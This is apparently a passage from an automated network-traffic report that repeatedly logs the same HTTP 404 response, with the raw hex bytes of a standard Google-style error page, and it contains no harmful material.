          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:54:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 